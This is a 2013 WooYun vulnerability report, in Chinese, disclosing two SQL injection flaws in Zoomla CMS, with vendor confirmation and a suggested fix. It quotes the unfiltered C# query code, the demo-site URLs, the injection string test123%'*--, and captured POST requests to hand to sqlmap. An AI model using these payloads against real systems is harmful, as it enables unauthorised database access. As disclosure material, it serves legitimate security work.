当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040878

漏洞标题:逐浪CMS通用型SQL注入1+2

相关厂商:逐浪CMS

漏洞作者: wefgod

提交时间:2013-11-19 02:40

修复时间:2014-01-03 02:40

公开时间:2014-01-03 02:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-20: 厂商已经确认,细节仅向厂商公开
2013-11-23: 细节向第三方安全合作伙伴开放
2014-01-14: 细节向核心白帽子及相关领域专家公开
2014-01-24: 细节向普通白帽子公开
2014-02-03: 细节向实习白帽子公开
2014-01-03: 细节向公众公开

简要描述:

之前因为这套CMS被人叫了一回专注哥了,来提两个逐浪CMS的注入吧

详细说明:

其实这套东西好多注入。
注入1:
http://demo.zoomla.cn/mis/target/page.aspx
TxtKey参数
string selectedValue = this.drType.SelectedValue;
string text = this.TxtKey.Text;
this.dt = this.bll.Sel(string.Concat(new string[]
{
"ParentID=0 And Inputer='",
this.buser.GetLogin().UserName,
"' And type like '%",
selectedValue,
"%' And Title like '%",
text, //没有过滤直接带入查询,导致漏洞产生
"%'"
}), "ID desc");
前台注册一个用户。
先到http://demo.zoomla.cn/mis/target/AddTarget.aspx
添加一个名为test123的目标
访问下面的链接:
http://demo.zoomla.cn/mis/target/page.aspx
搜索test123

image067.png


抓取数据包,把test123修改为test123%’*--
__VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2
连着cookie丢到sqlmap即可:

image069.png


image071.png

漏洞证明:

注入点2:
http://demo.zoomla.cn/mis/addmis.aspx
title参数
protected void Button_Click(object sender, EventArgs e)

DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤

随便输入点信息:

image073.png


点击确定,然后抓包
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID=
TextTitle=aaa 存在注入
带上COOKIE丢到sqlmap即可

image075.png


image077.png


image079.png

修复方案:

过滤,参数化查询。

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-11-20 08:45

厂商回复:

此问题已经处理,待官方新包更新(商业用户包和正式用户已投递更新包。

最新状态:

暂无